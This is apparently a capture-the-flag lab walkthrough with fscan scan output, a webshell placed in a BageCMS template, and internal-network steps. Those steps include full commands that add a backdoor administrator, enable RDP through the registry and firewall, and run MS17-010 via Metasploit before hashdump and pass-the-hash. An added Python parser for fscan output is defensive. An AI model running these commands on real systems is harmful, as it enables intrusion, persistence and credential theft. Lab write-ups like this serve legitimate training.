cyberstrikelab-lab7

Information gathering

   ___                              _    
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 2
192.168.10.10:139 open
192.168.10.233:22 open
192.168.10.10:135 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:5040 open
192.168.10.10:7680 open
192.168.10.233:8080 open
192.168.10.10:9652 open
192.168.10.233:11333 open
192.168.10.10:49665 open
192.168.10.10:49664 open
192.168.10.10:49666 open
192.168.10.10:49667 open
192.168.10.10:49668 open
192.168.10.10:49669 open
192.168.10.10:49670 open
[*] alive ports len is: 17
start vulscan
[*] WebTitle http://192.168.10.233:11333 code:404 len:19 title:None
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:网站标题-网站标题 - Powered By BageCMS

Let's see what vulnerabilities BageCMS has.

Getting a shell through the admin backend

http://192.168.10.10:9652/index.php?r=admini/default/index
I tried the password from before, admin123456, and the backend has a template editor that lets you write a shell directly.

I wrote the shell into the footer.

Success; connected with AntSword and got the flag.

Internal network penetration

The file upload wouldn't go through, so add a backdoor user and RDP in instead.

net user ocean admin@123 /add
net localgroup administrators ocean /add
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow
>fscan.exe -h 192.168.20.10/24

___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.40 is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.10:7680 open
192.168.20.40:88 open
192.168.20.20:3306 open
192.168.20.10:3306 open
192.168.20.40:445 open
192.168.20.40:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.40:135 open
192.168.20.20:135 open
192.168.20.10:135 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo
[*]192.168.20.40
[->]WIN-137FCI4D99A
[->]192.168.20.40
[*] NetInfo
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] MS17-010 192.168.20.40 (Windows Server 2016 Standard 14393)
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.40 [+] DC:WIN-137FCI4D99A.cyberstrikelab.com Windows Server 2016 Standard 14393
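To turn scan output like the above into an inventory a defender can act on (which host is the DC, which host the scanner flags for MS17-010 and needs patching), here is an added parser for this fscan 1.8.4 line format. It is example code written for this page, not part of the lab or of fscan; the sample lines are constructed to match the output shown, and the line patterns are assumed from that output only.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample in the shape of the fscan 1.8.4 output above (not a real capture).
SAMPLE = """\
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.40 is alive
192.168.20.40:445 open
192.168.20.10:445 open
192.168.20.40:88 open
[*] WebTitle http://192.168.10.10:9652 code:200 len:14625 title:Powered By BageCMS
[+] MS17-010 192.168.20.40 (Windows Server 2016 Standard 14393)
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] NetBios 192.168.20.40 [+] DC:WIN-137FCI4D99A.cyberstrikelab.com Windows Server 2016 Standard 14393
"""

# Line patterns assumed from the output shown on this page; other lines (banner, NetInfo) are skipped.
IP = r"(\d{1,3}(?:\.\d{1,3}){3})"
ALIVE_RE = re.compile(r"^\(icmp\) Target " + IP + r" is alive$")
PORT_RE = re.compile("^" + IP + r":(\d+) open$")
WEB_RE = re.compile(r"^\[\*\] WebTitle (\S+) code:(\d+) len:\d+ title:(.*)$")
VULN_RE = re.compile(r"^\[\+\] (\S+) " + IP + r" \((.*)\)$")
NETBIOS_RE = re.compile(r"^\[\*\] NetBios " + IP + r" (\[\+\] DC:)?(\S+) (.*)$")


def parse_fscan(text):
    """Build a per-IP inventory from fscan's alive/port/WebTitle/vuln/NetBios lines."""
    hosts = defaultdict(lambda: {"alive": False, "ports": [], "web": [], "vulns": [],
                                 "name": None, "os": None, "dc": False})
    for line in text.splitlines():
        line = line.strip()
        if m := ALIVE_RE.match(line):
            hosts[m[1]]["alive"] = True
        elif m := PORT_RE.match(line):
            hosts[m[1]]["ports"].append(int(m[2]))
        elif m := WEB_RE.match(line):  # key the web service by the URL's host part
            hosts[urlsplit(m[1]).hostname]["web"].append((m[1], int(m[2]), m[3]))
        elif m := VULN_RE.match(line):  # e.g. ("MS17-010", "Windows Server 2016 Standard 14393")
            hosts[m[2]]["vulns"].append((m[1], m[3]))
        elif m := NETBIOS_RE.match(line):  # the optional "[+] DC:" prefix marks a domain controller
            h = hosts[m[1]]
            h["dc"], h["name"], h["os"] = m[2] is not None, m[3], m[4]
    for h in hosts.values():
        h["ports"].sort()
    return dict(hosts)


def hosts_needing_patch(hosts):
    """Map each IP with a scanner-reported vulnerability to the names of its findings."""
    return {ip: [name for name, _ in h["vulns"]] for ip, h in hosts.items() if h["vulns"]}
```

Feed it the raw fscan output and the returned inventory shows at a glance that the MS17-010 finding sits on the domain controller, which is the host to patch and isolate first.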

There is an MS17-010 host on the internal network; set up a proxy and hit it.

Add a user

set command net user ocean admin@123 /add
set command net localgroup administrators ocean /add
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
set command netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow

Spawn a shell back to CS and forward it to bring the host online. Remember to run ms17_010 from msf here; the CS session comes online with high privileges, so hashdump directly to get the domain admin's hash.

Then do pass-the-hash.